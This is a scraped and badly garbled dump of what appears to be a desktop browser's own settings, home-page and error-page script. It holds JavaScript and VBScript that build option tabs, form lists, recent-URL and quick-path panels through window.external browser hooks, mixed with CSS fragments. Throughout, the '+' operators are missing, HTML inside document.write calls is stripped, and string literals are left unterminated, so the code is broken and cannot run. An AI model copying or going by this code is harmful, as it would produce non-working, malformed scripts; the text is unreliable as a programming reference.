oTd.onclick=OnDeleteUserFormItem;
oTd.innerHTML = "";
oTd1.innerHTML="";
formName = tw_getFormDataInfo( _vUserData[i].id, "tw_formName" );
oTd1.childNodes[0].innerText = formName;
formUrl = tw_getFormDataInfo( _vUserData[i].id, "tw_form_url" );
oTd1.childNodes[0].href = formUrl;
oTr.setAttribute( "tw_formID", _vUserData[i].id );
oTr.bgColor = "#F5F5F5";
_vCommonData.splice( 0, _vCommonData.length );
_vUserData.splice( 0, _vUserData.length );
formObj.id = tw_getFormDataByIndex( nIndex );
if(formObj.id.indexOf("twcommon_")!=-1)
_vCommonData[_vCommonData.length] = formObj;
_vUserData[_vUserData.length] = formObj;
addForm.style.color = _tabtextcolor;
if( _vCommonData.length == 0 ){
if( _vCommonData.length > 0 )
pObj = TalComForm.rows[0].cells[1];
document.write( "" );
var _strLoginInfo="
var _strPassQues="
var _strPass="
var _strPassAnswer="
var _strWeb="
var _strWebSite = "
var _strWebSiteLink = "http://www.fjmjm.com";
var _strPhoenixLink = "http://www.fjmjm.com";
var _strThanksLink = "http://www.fjmjm.com";
Dim g_urlArray( 1024 ):Dim g_nCountVB:g_nCountVB = 0:Function SetArray( nIndex, strItem ):if nIdex < 1024 then:
g_urlArray( nIndex ) = strItem:
end if:End Function:Function OpenAllByVB( ):call window.external.twmutinavigate( window, "", g_urlArray(0), g_nCountVB ):End Function
g_strSecurityId = external.twGetSecurityID( window )
ret = external.twoption( g_strSecurityId, nID, bWrite, g_lValue, g_bstrValue1, g_bstrValue2, g_strArray(0), g_arraySize )
var oNewNode = document.createElement("LI");
header_btn.appendChild(oNewNode);
    inFrame.document.write( "" );
    inFrame.document.write( "
    " );
    inFrame.document.write( "
    " );
    inFrame.document.write( "
    " );
    inFrame.document.body.leftMargin = 0;
    inFrame.document.body.topMargin = 0;
    inFrame.document.body.rightMargin = 0;
    inFrame.document.body.bottomMargin = 0;
    inFrame.document.body.marginwidth = 0;
    inFrame.document.body.marginheight = 0;
    function InsertInfoItemByHTML( nLine, nChar, nErrCode, strErrMsg, strErrUrl )
    oHint.style.display="none";
    infoTable = inFrame.window.oTa;
    var oTr = infoTable.insertRow( -1 );
    oColl = infoTable.rows;
    if( oColl.length%2 )
    oTr.bgColor = "#FFFFFF";
    oTr.bgColor = "#F4FBFF";
    strLine = strTemp.replace( "$ERR_TEMP", nLine );
    strChar = strTemp.replace( "$ERR_TEMP", nChar );
    strMSG = strTemp.replace( "$ERR_TEMP", strErrMsg );
    strCode = strTemp.replace( "$ERR_TEMP", nErrCode );
    strHTML = _strHTMLString.replace( "$ERR_LINE", strLine );
    strHTML = strHTML.replace( "$ERR_CHAR", strChar );
    strHTML = strHTML.replace( "$ERR_MSG", strMSG );
    strHTML = strHTML.replace( "$ERR_CODE", strCode );
    strHTML = strHTML.replace( "$ERR_URL", strErrUrl );
    oTd.innerHTML = strHTML;
    oTr.scrollIntoView(true);
    document.write( "
    \
    "   _strExit   "
    document.write( "
     "   _strBtnOK   "\
      "   _strBtnCancel   "" );
    optionsTab.tabid = tabid;
    optionsTab.tabname = tabname;
    optionsTab.tabbgcolor = "#FFFFFF";
    optionsTab.tabhotbgcolor = "#CDE3F5";
    optionsTab.tabtextcolor = "#000000";
    optionsTab.tabhottextcolor = "#FF5A00";
    optionsTab.vSubTitleArray = new Array();
    _vOptionTabsArray[_vOptionTabsArray.length] = optionsTab;
    return optionsTab.vSubTitleArray;
    tabSubTitle.titlename = titlename;
    tabSubTitle.titleHelpLink = "";
    tabSubTitle.vIA = new Array();
    if ( arguments.length >= 3 )
    tabSubTitle.titleHelpLink = titleHelpLink;
    vSubTitleArray[vSubTitleArray.length] = tabSubTitle;
    return tabSubTitle.vIA;
    contextItem.itemID = itemID;
    contextItem.itemIndex = -1;
    contextItem.itemType = itemType;
    contextItem.itemText = itemText;
    contextItem.bItemChange = false;
    contextItem.vAA = new Array();
    contextItem.itemCode = "";
    contextItem.itemAfterCode = "";
    contextItem.itemPreCode = "";
    contextItem.itemHelpLink = "";
    if ( arguments.length >= 5 )
    contextItem.itemPreCode = itemPreCode;
    if ( arguments.length >= 6 )
    contextItem.itemAfterCode = itemAfterCode;
    if ( arguments.length >= 7 )
    contextItem.itemCode = itemCode;
    vIA[vIA.length] = contextItem;
    contextItem.itemIndex = _vOIA.length;
    _vOIA[_vOIA.length] = contextItem;
    if ( "ckbedit" == itemType && "" != contextItem.itemCode )
    contextItem.itemCode = contextItem.itemCode.replace( /#IDDEFINE/g, "id=item_edit_"   contextItem.itemIndex );
    return contextItem.itemIndex;
    radioBtn.btnText = btnText;
    radioBtn.btnPreCode = "";
    radioBtn.btnAfterCode = "";
    radioBtn.vAA = new Array();
    radioBtn.btnPreCode = btnPreCode;
    if ( arguments.length >= 4 )
    radioBtn.btnAfterCode = btnAfterCode;
    var nIndex = vRadioArray.length;
    tableList.tableRgnSize = tableRgnSize;
    tableList.tableHeight = tableHeight;
    tableList.vTopBtn = new Array();
    tableList.vBottomBtn = new Array();
    tableList.vHeader = new Array();
    tableList.bHaveCheckBox = bChecked;
    var vHeader = tableList.vHeader;
    oHeader.headerText = headerText;
    oHeader.headerWidth = headerWidth;
    oHeader.bHidden = bHidden;
    oHeader.headerText = "";
    vHeader[ vHeader.length ] = oHeader;
    var vBtn = tableList.vTopBtn;
    vBtn = tableList.vBottomBtn;
    oBtn.btnOpt = btnOpt;
    oBtn.btnText = btnText;
    vBtn[ vBtn.length ] = oBtn;
    for ( var ix = 0; ix < _vOptionTabsArray.length; ix    )
    document.write( "" );
    document.write( "
    " );
    document.write( ""   _vOptionTabsArray[ix].tabname   "" );
    for ( ix = 0; ix < _vOptionTabsArray.length; ix    )
    if ( _SelectTabIndex == _vOptionTabsArray[ix].tabid )
    if ( ix >= _vOptionTabsArray.length )
    _SelectTabIndex = _vOptionTabsArray[0].tabid;
    eval( "tabs_tr_"   _SelectTabIndex ).bgColor = _vOptionTabsArray[_SelectTabIndex].tabbgcolor;
    eval( "tabs_table_"   _SelectTabIndex ).style.display = "none";
    eval( "tabs_tr_"   _SelectTabIndex ).bgColor = _vOptionTabsArray[_SelectTabIndex].tabhotbgcolor;
    eval( "tabs_table_"   _SelectTabIndex ).style.display = "";
    divform_context.scrollTop = 0;
    _vOIA[ nIndex ].bItemChange = true;
    for ( var ix = 0; ix < vAA.length; ix    )
    var itemType = _vOIA[ vAA[ix] ].itemType;
    eval( "item_ckb_"   vAA[ix] ).disabled = bDisabled;
    eval( "item_edit_"   vAA[ix] ).disabled = bDisabled;
    oCheckBox.disabled = bDisabled;
    eval( "item_edit_"   vAA[ix] ).disabled = ( oCheckBox.disabled || !oCheckBox.checked );
    eval( "item_edit1_"   vAA[ix] ).disabled = bDisabled;
    eval( "item_edit2_"   vAA[ix] ).disabled = bDisabled;
    eval( "item_btn_"   vAA[ix] ).disabled = bDisabled;
    var vRadioArray = _vOIA[ vAA[ix] ].itemCode;
    for ( var radioIndex = 0; radioIndex < vRadioArray.length; radioIndex    )
    eval( "item_radio_"   vAA[ix]   "["   radioIndex   "]" ).disabled = bDisabled;
    eval( "item_list_"   vAA[ix] ).disabled = bDisabled;
    eval( "item_textarea_"   vAA[ix] ).disabled = bDisabled;
    if ( "ckb" == _vOIA[ nIndex ].itemType )
    if ( !eval( "item_ckb_"   nIndex ).disabled )
    bCheck = eval( "item_ckb_"   nIndex ).checked;
    RealDoAssociate( _vOIA[ nIndex ].vAA, !bCheck, bRecursive );
    else if ( "ckbedit" == _vOIA[ nIndex ].itemType )
    eval( "item_edit_"   nIndex ).disabled = !bCheck;
    else if ( "radio" == _vOIA[ nIndex ].itemType )
    var vRadioArray = _vOIA[ nIndex ].itemCode;
    var vAA = vRadioArray[ radioIndex ].vAA;
    if ( !eval( "item_radioid_"   nIndex   radioIndex ).disabled )
    bCheck = eval( "item_radioid_"   nIndex   radioIndex ).checked;
    document.write( "
     " _vOptionTabsArray[ix].tabname " " );
    for ( var x = 0; x < _vOptionTabsArray[ix].vSubTitleArray.length; x    )
    if ( "" != _vOptionTabsArray[ix].vSubTitleArray[x].titleHelpLink )
    titleHelp = " ";
    document.write( "
    " );
    vIA = _vOptionTabsArray[ix].vSubTitleArray[x].vIA;
    for ( var y = 0; y < vIA.length; y    )
    var itemEnd = vIA[y].itemAfterCode   "";
    if ( "" != vIA[y].itemHelpLink )
    itemEnd = " "   vIA[y].itemAfterCode   "";
    if ( "ckb" == vIA[y].itemType )
    nRet = DoOption( vIA[y].itemID, false );
    document.write( itemBegin   "
    " );
    document.write( "
    " _vOptionTabsArray[ix].vSubTitleArray[x].titlename "" titleHelp "
    " vIA[y].itemPreCode "" itemEnd );
    eval( "item_ckb_"   vIA[y].itemIndex ).checked = Boolean( g_lValue );
    eval( "item_ckb_"   vIA[y].itemIndex ).disabled = true;
    else if ( "text" == vIA[y].itemType )
    document.write( itemBegin   "
    " vIA[y].itemPreCode vIA[y].itemText itemEnd );
    else if ( "edit" == vIA[y].itemType )
    document.write( itemBegin   "
    " vIA[y].itemPreCode "" itemEnd );
    eval( "item_edit_"   vIA[y].itemIndex ).value = g_bstrValue1;
    eval( "item_edit_"   vIA[y].itemIndex ).disabled = true;
    else if ( "ckbedit" == vIA[y].itemType )
    document.write( itemBegin   "
    " vIA[y].itemPreCode "" );
    if ( vIA[y].itemCode == "" )
    document.write( "" );
    document.write( vIA[y].itemCode );
    document.write( itemEnd );
    else if ( "quickaddr" == vIA[y].itemType )
    document.write( itemBegin   "
    " vIA[y].itemPreCode "
    " vIA[y].itemText "" vIA[y].itemCode "
    " itemEnd );
    eval( "item_edit1_"   vIA[y].itemIndex ).value = g_bstrValue1;
    eval( "item_edit2_"   vIA[y].itemIndex ).value = g_bstrValue2;
    eval( "item_edit1_"   vIA[y].itemIndex ).disabled = true;
    eval( "item_edit2_"   vIA[y].itemIndex ).disabled = true;
    else if ( "fileselect" == vIA[y].itemType )
    document.write( itemBegin   "
    " vIA[y].itemPreCode vIA[y].itemText " " itemEnd );
    eval( "item_btn_"   vIA[y].itemIndex ).disabled = true;
    else if ( "radio" == vIA[y].itemType )
    var vRadioArray = vIA[y].itemCode;
    document.write( itemBegin   "
    " vIA[y].itemPreCode );
    document.write( vRadioArray[ radioIndex ].btnPreCode   ""   vRadioArray[ radioIndex ].btnAfterCode );
    eval( "item_radio_"   vIA[y].itemIndex   "["   g_lValue   "]" ).checked = true;
    for ( radioIndex = 0; radioIndex < vRadioArray.length; radioIndex    )
    eval( "item_radio_"   vIA[y].itemIndex   "["   radioIndex   "]" ).disabled = true;
    else if ( "list" == vIA[y].itemType )
    document.write( itemBegin   "
    " vIA[y].itemPreCode vIA[y].itemText "" itemEnd );
    eval( "item_list_"   vIA[y].itemIndex ).selectedIndex = g_lValue;
    eval( "item_list_"   vIA[y].itemIndex ).disabled = true;
    else if ( "btn" == vIA[y].itemType )
    document.write( itemBegin   "
    " vIA[y].itemPreCode "" itemEnd );
    else if ( "textarea" == vIA[y].itemType )
    document.write( itemBegin   "
    " vIA[y].itemPreCode "" itemEnd );
    eval( "item_textarea_"   vIA[y].itemIndex ).value = g_bstrValue1;
    eval( "item_textarea_"   vIA[y].itemIndex ).disabled = true;
    else if ( "gesture" == vIA[y].itemType )
    document.write( itemBegin   "
    " vIA[y].itemPreCode "
    " );
    document.write( ""   vIA[y].itemCode   "
    " );
    document.write( "
    " );
    document.write( "
    " );
    gesture_listsel.style.posWidth = 250;
    var arrayID = g_strArray.toArray();
    var arrayImg = g_strArray.toArray();
    var arrayText = g_strArray.toArray();
    document.write( "
    " );
    document.write( "
    " );
    eval( "gesture_seltext_"   arrayIndex ).innerHTML = " "   gesture_listsel.options[wHigh].value;
    document.write( "
    " );
    document.write( "  "   arrayText[arrayIndex]   "
    " itemEnd );
    else if ( "tablelist" == vIA[y].itemType )
    var tableList = vIA[y].itemCode;
    document.write( itemBegin   "
    " vIA[y].itemPreCode "" );
    document.write( "
    " );
    document.write( "" );
    document.write( "" );
    for ( var headerIndex = vHeader.length - 1; headerIndex >= 0; headerIndex -- )
    if ( !vHeader[ headerIndex ].bHidden )
    vHeader[ nLastNoHiddenHeader ].headerWidth  = 17;
    for ( headerIndex = 0; headerIndex < vHeader.length; headerIndex    )
    document.write( "
    " );
    vHeader[ nLastNoHiddenHeader ].headerWidth -= 17;
    document.write( "
    " vHeader[ headerIndex ].headerText "
    " );
    document.write( "
    " );
    if( vIA[y].itemID == 2200 )
    InsertSearchTableListRow( vIA[y].itemIndex, arrayIndex, g_strArray.getItem( arrayIndex ) );
    InsertTableListRow( vIA[y].itemIndex, arrayIndex, g_strArray.getItem( arrayIndex ) );
    document.write( "
    " );
    var vTopBtn = tableList.vTopBtn;
    for ( var btnIndex = 0; btnIndex < vTopBtn.length; btnIndex    )
    document.write( "
    " );
    document.write( "" );
    eval( "tablelist_"   vTopBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).style.posWidth = 90;
    eval( "tablelist_"   vTopBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).disabled = true;
    document.write( "
    " );
    var vBottomBtn = tableList.vBottomBtn;
    for ( btnIndex = 0; btnIndex < vBottomBtn.length; btnIndex    )
    document.write( "" );
    eval( "tablelist_"   vBottomBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).style.posWidth = 90;
    eval( "tablelist_"   vBottomBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).disabled = true;
    document.write( "
    " itemEnd );
    document.write( "
    " );
    for ( var ix = 0; ix < _vOIA.length; ix    )
    var x1 = strItem.search( /:\^:/ );
    strCol = strItem.substr( 0 );
    strCol = strItem.substring( 0, x1 );
    strItem = strItem.substr( x1   3 );
    var searchUrl = varArray[2];
    var searchKey = varArray[3];
    var strTemp = strChecked   ":^:"   searchName   ":^:"   searchKey   ":^:"   searchUrl   ":^:"   searchHome;
    var tableList = _vOIA[ nIndex ].itemCode;
    var oTr = oTable.insertRow( nPos );
    oTr.style.cursor = "default";
    oTr.id = "tablelist_"   nIndex   "_item"   nPos;
    oTr.onclick = OnTableListTrClick;
    for ( var ix = 0; ix < vHeader.length; ix    )
    var oTd = oTr.insertCell();
    if( ix == 0 && tableList.bHaveCheckBox )
    if ( vHeader[ix].bHidden )
    oTd.innerHTML = "";;
    oTd.innerHTML = strCol;
    oTd.width = vHeader[ix].headerWidth;
    oTd.style.wordWrap = "break-word";
    nID = this.id;
    var x1 = nID.search( /_.*_/ )   1;
    var x2 = nID.search( /_item*/ );
    var nIndex = nID.substring( x1, x2 );
    var nItemIndex = nID.substr( x2   5 );
    var nSelect = eval( "tablelist_select_"   nIndex ).value;
    eval( "tablelist_"   nIndex   "_item"   nSelect ).bgColor = "#FFFFFF";
    eval( nID ).bgColor = "#DFF4F8";
    eval( "tablelist_select_"   nIndex ).value = nItemIndex;
    var x1 = nID.search( /_*_/ )   1;
    var x2 = nID.search( /_index*/ );
    var btnOpt = nID.substring( x1, x2 );
    var nIndex = nID.substr( x2   6 );
    if ( -1 != oSelect.value )
    oTable.deleteRow( oSelect.value );
    for ( var ix = 0; ix < oTable.rows.length; ix    )
    oTable.rows( ix ).id = "tablelist_"   nIndex   "_item"   ix;
    if ( 0 == oTable.rows.length )
    oSelect.value = -1;
    else if ( oSelect.value >= oTable.rows.length )
    oSelect.value --;
    eval( "tablelist_"   nIndex   "_item"   oSelect.value ).bgColor = "#DFF4F8";
    if ( -1 != ( Number( oSelect.value ) - 1 ) )
    oTable.moveRow( oSelect.value, Number( oSelect.value ) - 1 );
    oSelect.value = Number( oSelect.value ) - 1;
    if ( Number( oSelect.value )   1 < ( oTable.rows.length ) )
    oTable.moveRow( oSelect.value, Number( oSelect.value )   1 );
    oSelect.value = Number( oSelect.value )   1;
    DoAction( _vOIA[ nIndex ].itemID, 0 );
    if( 2200 == _vOIA[ nIndex ].itemID )//
    InsertSearchTableListRow( nIndex, oTable.rows.length, g_strActionParam );
    InsertTableListRow( nIndex, oTable.rows.length, g_strActionParam );
    var oTr = oTable.rows[ oSelect.value ];
    g_strActionParam = oTr.cells[1].innerText   ":^:";
    var col = oTr.cells[0].getElementsByTagName("input");
    if(col[0].value == "on" )
    g_strActionParam  = oTr.cells[3].innerText;
    g_strActionParam  = oTr.cells[2].innerText;
    for ( var ix = 4; ix < oTr.cells.length; ix    )
    g_strActionParam  = oTr.cells[ix].innerText;
    if ( Number( ix   1 ) != oTr.cells.length )
    for ( var ix = 0; ix < oTr.cells.length; ix    )
    if ( "" == oTr.cells[ix].innerText )
    var col = oTr.cells[ix].getElementsByTagName( "input" );
    g_strActionParam  = col[0].value;
    DoAction( _vOIA[ nIndex ].itemID, 1 );
    InsertSearchTableListRow( nIndex, oSelect.value, g_strActionParam );
    InsertTableListRow( nIndex, oSelect.value, g_strActionParam );
    for ( ix = 0; ix < _vOIA.length; ix    )
    if ( "btn" == _vOIA[ix].itemType )
    if ( _vOIA[ix].bItemChange )
    if ( "ckb" == _vOIA[ix].itemType )
    g_lValue = eval( "item_ckb_"   ix ).checked;
    else if ( "edit" == _vOIA[ix].itemType )
    g_bstrValue1 = eval( "item_edit_"   ix ).value;
    else if ( "ckbedit" == _vOIA[ix].itemType )
    else if ( "quickaddr" == _vOIA[ix].itemType )
    g_bstrValue1 = eval( "item_edit1_"   ix ).value;
    g_bstrValue2 = eval( "item_edit2_"   ix ).value;
    else if ( "fileselect" == _vOIA[ix].itemType )
    else if ( "radio" == _vOIA[ix].itemType )
    var vRadioArray = _vOIA[ix].itemCode;
    if ( eval( "item_radio_"   ix   "["   radioIndex   "]" ).checked )
    else if ( "textarea" == _vOIA[ix].itemType )
    g_bstrValue1 = eval( "item_textarea_"   ix ).value;
    else if ( "list" == _vOIA[ix].itemType )
    g_lValue = eval( "item_list_"   ix ).selectedIndex;
    g_bstrValue1 = eval( "item_list_"   ix ).value;
    else if ( "tablelist" == _vOIA[ix].itemType )
    g_arraySize = oTable.rows.length;
    var oTr = oTable.rows[x];
    if( 2200 == _vOIA[ ix ].itemID )//
    strItem = oTr.cells[1].innerText   ":^:";
    if(col[0].checked == true )
    strItem  = oTr.cells[3].innerText   ":^:";
    strItem  = oTr.cells[2].innerText   ":^:";
    for ( var y = 4; y < oTr.cells.length; y    )
    strItem  = oTr.cells[y].innerText;
    if ( Number( y   1 ) != oTr.cells.length )
    for ( var y = 0; y < oTr.cells.length; y    )
    if ( "" == oTr.cells[y].innerText )
    var col = oTr.cells[y].getElementsByTagName( "input" );
    strItem  = col[0].value;
    var oTr = oTable.rows[0];
    col[0].checked = true;
    else if ( "gesture" == _vOIA[ix].itemType )
    g_arraySize = gesture_table.rows.length;
    var strItem = ( eval( "gesture_id_"   arrayIndex ).value & 0xffff ) | ( ( eval( "gesture_sel_"   arrayIndex ).value & 0xffff ) << 16 )
    DoOption( _vOIA[ix].itemID, true );
    _vOIA[ix].bItemChange = false;
    external.twclosetab( window, "" );
    Call external.twaction( window, nID, nCode, g_strActionParam )
    var _strHelpLink = "http://www.fjmjm.com";
    var _strHelpLinkRoot = "http://www.fjmjm.com/hl/cn/";
    ", "h1.1.htm" );
    ", "h1.2.htm" );
    :8-256)" );
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 2402, "ckb", "
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 2102, "quickaddr", "Ctrl Enter       ", "
    ", "
    ", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 2103, "quickaddr", "Shift Enter      ", "
    ", "
    ", "
    _vOIA[nIndex].vAA[2] = AddCI( vIA, 2104, "quickaddr", "Ctrl Shift Enter ", "
    ", "
    ", "
    _vOIA[nIndex].vAA[3] = AddCI( vIA, 2105, "quickaddr", "Ctrl Alt Enter", "
    ", "
    ", "
    AddCI( vIA, -1, "text", "
    ", "h2.htm#1" );
    ", "h3.1.htm" );
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 3302, "ckb", "
    Windows2000
    HTTPS
    _vOIA[_vOIA[nIndex].vAA[0]].vAA[0] = AddCI( vIA, 3303, "radio", "", "
    ", "
    ", vRadioArray );
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 3304, "ckb", "
    nIndex=_vOIA[nIndex].vAA[1];
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 3305, "ckb", "
    ", "h3.2.htm" );
    vRadioArray[2].vAA[0] = AddCI( vIA, 3203, "list", "
    .torrent;.ram)
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 4003, "ckb", "
    ", "h4.htm#1" );
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 4102, "ckb", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 4103, "ckb", "
    _vOIA[nIndex].vAA[2] = AddCI( vIA, 4104, "ckb", "
    ", "h4.htm#2" );
    ", "h4.1.htm" );
    _vOIA[nIndex].vAA[0]=AddCI( vIA, 4403, "edit", "45", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 4402, "textarea", "", "
    ", "
    ", "cols=\"70\" rows=\"12\"" );
    www.fjmjm.com
    _vOIA[nIndex].itemHelpLink = "h5.htm#1";
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 5007, "radio", "", "
    ", "
    ", vRadioArray );
    _vOIA[nIndex].itemHelpLink = "h5.htm#2";
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 5003, "ckb", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 5004, "ckb", "
    _vOIA[nIndex].vAA[2] = AddCI( vIA, 5005, "ckb", "
    _vOIA[nIndex].vAA[3] = AddCI( vIA, 5008, "ckb", "
    ", "h5.1.htm" );
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 5203, "fileselect", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 5204, "ckb", "
    _vOIA[nIndex].vAA[2] = AddCI( vIA, 5205, "ckb", "
    _vOIA[nIndex].vAA[3] = AddCI( vIA, 5206, "radio", "", "
    ", "
    ", vRadioArray );
       
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 7002, "ckb", "Internet
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 7003, "ckb", "
    _vOIA[nIndex].vAA[2] = AddCI( vIA, 7004, "ckb", "Cookies
    _vOIA[nIndex].vAA[3] = AddCI( vIA, 7005, "ckb", "
    _vOIA[nIndex].vAA[4] = AddCI( vIA, 7006, "ckb", "
    _vOIA[nIndex].vAA[5] = AddCI( vIA, 7007, "ckb", "
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 7100, "ckb", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 7102, "btn", "
    ", "h8.htm#1" );
    ", "h8.htm#2" );
    _vOIA[nIndex].itemHelpLink = "h8.htm#3";
    ", "" );
    127.0.0.1:80@HTTP#
    Vista/Windows7
    Windows
    XMLHttpRequest
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 9109, "ckb", "
    a.overflowHide {overflow:hidden;text-overflow:ellipsis;white-space:nowrap; width: 95%;}
    .white:hover {font-size:12px;text-decoration:none;color: #FF5A00}
    .wrap {width:700px;padding-left:40;font-size:12px;}
    .headwrap {width:100%;height:48;overflow:hidden;background-image:url(sztop2.gif);line-height: 40px;background-repeat:repeat-x;}
    .header_l {text-indent:30px;width:309px;font-size:15px;color:#FFFFFF;font-weight:bold;float:left;background-image:url(sztop.gif);background-repeat:no-repeat;}
    .header_r {height:48;float:right;}
    .header_r ul {padding-right:20px;*padding-top:10px;}
    .header_r ul li {float:left;}
    .title_frame {width:100%;overflow:hidden;font-size:12px;font-weight:bold;color:#3399cc;margin-top:16px;}
    .title_l {float:left;}
    .title_r {float:right;font-weight:normal;}
    .title_r A:link {font-size:12px;text-decoration:none;color: #3399cc}
    .title_r A:visited {font-size:12px;text-decoration:none;color: #3399cc}
    .title_r ul li {float:left;padding-left:20px;}
    .separator {width:100%;height:1px;border-top:1px solid #b7d8ed;padding:0;margin:5 0 0 0;}
    #qp_item ul li div a.overflowHide{margin-left:8px;height:16px;overflow:hidden;text-overflow:ellipsis;width:85%;}
    #qp_item .addAddress {margin: 0 0 0 40;}
    #url_item {width:100%;}
    #url_item ul {float:left;width:100%;}
    #url_item ul li {float:left;width:100%;height:32px;}
    #url_item ul li a {;height:16px; margin-left: 8px;}
    #url_item ul li img {height:16px;}
    //twinfo.htm
    :$ERR_MSG
    :$ERR_CODE
    URL:
    $ERR_URL";
    //twpage.htm tp*
    var _tpLastUrl = "
    var _tpAddURL = '
    var _message_noneURL = '
    //navierr.htm
    function twRS (str) {document.write(str);}
    var tip_show, g_s_id = external.twGetSecurityID(window), isTpShow, _userPages;
    var tTp = external.twGetDailyTips(g_s_id);
    if(tTp && tTp.length)
    isTpShow = true, tipText.innerHTML = tTp;
    isTpShow = false, _id('topImg_3').style.filter = 'alpha(opacity=50)', endLine.style.display = 'inline', dailytips.style.display = 'none';
    _id('topImg_3').style.filter = 'alpha(opacity='   (tip_show == '0' ? 50 : 99)   ')';
    endLine.style.display = tip_show == '0' ? 'inline' : 'none', dailytips.style.display = tip_show == '0' ? 'none' : 'inline';
    btn.innerHTML = "";
    tip_show = external.getOptionValue(g_s_id, "twhome", "showtip"), Tipshow();
    var url_loaded = 0, url_show = '', lastUrlName = [], lastUrl = [], ctLt = 0,
    oldUrlName = [], oldUrl = [], ctOld = 0, twurldivTemp = document.createElement( "div" );
    function tw_getUrlData(i, t){
    return external.twgetlasturl(window, '', i, t ? 1 : 0);
    external.twdeletelasturl(window, '', str_url = (t ? lastUrl : oldUrl)[num = Number(i)], t ? 0 : 1), (t ? lastUrl : oldUrl)[num] = "";
    for(var i = 0; str_data = tw_getUrlData(i, 0); i   , ctLt   )
    arr_temp = str_data.split(str_data.indexOf("**") != -1 ? "**" : "::"), lastUrl[i] = arr_temp[0], lastUrlName[i] = arr_temp[1];
    for(var i = 0; str_data = tw_getUrlData(i, 1); i   , ctOld   )
    arr_temp = str_data.split(str_data.indexOf("**") != -1 ? "**" : "::"), oldUrl[i] = arr_temp[0], oldUrlName[i] = arr_temp[1];
    function URL_Openall(){
    var lists = document.getElementById("url_item").getElementsByTagName("a");
    for(var i=0;i
    SetArray(g_nCountVB  ,lists[i].href);
    _userPages || (external.twclosetab(window,''));
    function OnBodyKeydown () {
    13 == event.keyCode && URL_Openall();
    function Url_LoadItem() {
    if(document.getElementById("lasturl").currentStyle.display=="none")
    url_loaded = 1, strHTML = document.createElement('ul');
    if (lastUrl.length oldUrl.length == 0)
    return (url_show = '0', lasturl.style.display = 'none', _id('topImg_2').style.filter = 'alpha(opacity=50)');
    if(i>lastUrl.length-1)
    candidate.push("
  • " filter(lastUrlName[i]) "
  • ");
    while(availSize>=0 && j<=oldUrl.length-1){
    candidate2.push("
  • " filter(oldUrlName[j]) "
  • ");
    strHTML.innerHTML = candidate2.join("") candidate.join("");
    url_item.appendChild(strHTML);
    for(var i = 0, tA = _tag('a', strHTML); i < tA.length;i  ){
    tA[i].className = tA[i].offsetWidth > 618 ? 'overflowHide' : '';
    function Urlshow(){
    _id('topImg_2').style.filter = 'alpha(opacity='   (url_show == '0' ? 50 : 99)   ')';
    lasturl.style.display = url_show == "0" ? "none" : "inline";
    url_loaded || Url_LoadItem();
    function Url_showSwitch() {
    tw_setOptVal("twhome", "showurl", url_show = url_show == "0" ? "1" : "0"), Urlshow();
    function InitUrlList() {
    btn.innerHTML = "";
    url_show = external.getOptionValue(g_s_id, "twhome", "showurl"), url_show = url_show || '1', Urlshow();
    function clearFullUrl () {
    for(var i = 0, tU = lastUrl,tOU = oldUrl; i < tU.length   tOU.length; i   )
    external.twdeletelasturl(window, '', i < tU.length ? tU[i] : tOU[i - tU.length], i < tU.length ? 0 : 1);
    lastUrlName = [], lastUrl = [], oldUrlName = [], oldUrl = [];
    url_item.innerHTML = '', url_show = '0', Urlshow();
    function getDomainByUrl( strUrl ) {return strUrl.replace(/^(http:\/\/[^\/] )\/.*/g, "$1");}
    var tryPath = external.twGetAppPath(g_s_id), strUrl = "user2.gif", tId = encodeURIComponent(strDomain)   parseInt(Math.random() * 1000, 10);
    if (strDomain && strDomain.length)
    strDomain  = (strDomain.length - 1 != strDomain.lastIndexOf("/") ? '/' : ''), strUrl = strDomain.length > 1 ? strDomain   "favicon.ico" : strUrl;
    tImg.onload = function () {_id(tId).src = this.src;}
    tImg.src = tryPath   '/ImgCache/'   strUrl.replace(/\w*:\/\//, '').replace(/\//g, '_');
    return "";
    while(line = external.getOptionValue(g_s_id, "twhome", "qp" i)){
    dataList.push(line);
    return (dataList.length==0)? null:dataList;
    this.clearData();
    if(!dataList.length)
    for(var i=0,len=dataList.length;i
    external.setOptionValue(g_s_id, "twhome", "qp" i, dataList[i]);
    external.setOptionValue(g_s_id, "twhome", "qp" i, '');
    function QP_assign(url){
    external.twnewnavigate(window, g_s_id, url, 0, 0, 0, 0);
    function QP_adjustUrl(url){
    if(pattern.test(url))
    return url;
    return "http://" url;
    var list = QPLocalDataMgr.readData();
    var strBuf = external.GetQuickPathValue(g_s_id);
    if(strBuf.length){
    list = strBuf.split(":&:");
    list.pop();
    if(list && list.length>0) {
    for(var i = 0; i < _strQPItem.length; i    )
    temp = _strQPItem[i].split( ":^:" ), strDomain = getDomainByUrl( temp[0] ), strHTML  = "
  • " QP_InsertFavIcon( strDomain ) "" filter(temp[1]) "
  • ";
    qp_item.innerHTML = strHTML   "";
    for (var i = 0, tA = _tag('a', qp_item);i < tA.length; i   )
    tA[i].className = tA[i].offsetWidth > 122 ? 'overflowHide' : '';
    _userPages = false, qp_tip.style.display='inline', qp_item.style.display='none';
    _id('topImg_1').style.filter = 'alpha(opacity='   (qp_show == '0' ? 50 : 99)   ')';
    quickpath.style.display = (qp_show == '0' ? 'none' : 'inline'), qp_show == '0' || QP_LoadItem();
